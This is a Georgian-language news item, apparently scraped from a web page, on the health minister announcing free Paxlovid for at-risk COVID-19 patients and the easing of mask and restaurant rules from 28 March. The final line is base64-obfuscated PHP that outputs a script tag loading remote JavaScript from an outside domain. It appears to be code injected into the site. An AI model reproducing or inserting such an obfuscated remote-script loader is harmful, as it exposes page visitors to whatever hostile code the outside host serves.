celsiusi
ავერსი საქკაბელი
ჯანდაცვის მინისტრმა ზურაბ აზარაშვილმა განაცხადა, რომ მიმდინარე კვირაში საქართველოში კოვიდ 19-ის სამკურნალო პრეპარატი “პაქსლოვიდის” პირველი პარტია შემოვა. მინისტრის განცხადებით, Pfizer-ის მიერ დამზადებული მედიკამენტი უფასოდ დაურიგდებათ იმ პირებს, რომლებიც კოვიდის დადასტურების შემთხვევაში მდგომარეობის დამძიმების რისკის ქვეშ არიან.
 
“ამ კვირაში უკვე გვექნება კოვიდის სამკურნალო პრეპარატი, ეს არის Pfizer-ის მიერ შექმნილი "პაქსლოვიდი", რომელიც ჯერჯერობით სულ აქვს რამდენიმე ქვეყანას და ძალიან მიხარია, რომ ერთ-ერთი ჩვენი ქვეყანა იქნება. ყველა ვინც შეიძლება დამძიმდეს, ყველას მათ დავურიგებთ უფასოდ და ისინი იმკურნალებენ ინფიცირებიდან პირველი 5 დღის განმავლობაში და აუცილებელია ამ მედიკამენტების მიღება.
 
ამ პრეპარატის დოზების და ფასის შესახებ ინფორმაცია კონფიდენციალურია, ასევე ეტაპობრივად შემოვა ახალი დოზებიც,”- განაცხადა მინისტრმა.
 
დღესვე მთავრობის საკოორდინაციო საბჭომ კოვიდ-19-ის რეგულაციების შემსუბუქების მიმართულებით მიიღო გადაწყვეტილებები. 28 მარტიდან ღია სივრცეში პირბადის ტარება აღარ იქნება სავალდებულო. უქმდება საკვებ ობიექტებში სტუმრების რაოდენობაზე დაწესებული შეზღუდვები და ა.შ.
 
847
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");